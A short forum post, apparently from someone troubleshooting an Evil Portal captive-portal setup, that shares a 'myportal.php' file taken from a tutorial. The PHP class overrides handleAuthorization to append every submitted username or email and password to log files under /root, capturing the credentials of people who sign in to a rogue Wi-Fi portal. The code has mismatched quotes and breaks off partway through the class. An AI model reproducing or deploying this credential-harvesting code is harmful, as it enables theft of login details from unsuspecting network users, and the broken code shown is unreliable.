oh and i also tried using the "myportal.php", from the newer tutorial...
code below...
myportal.php
<?php namespace evilportal;
class MyPortal extends Portal
{
public function handleAuthorization()
{
file_put_contents('/root/emails.log',""{$this->request->user}\n",FILE_APPEND);
file_put_contents('/root/passwords.log',""{$this->request->pass}\n",FILE_APPEND);
// Call parent to handle basic authorization first
parent::handleAuthorization();
// Check for other form data here
}
public function showSuccess()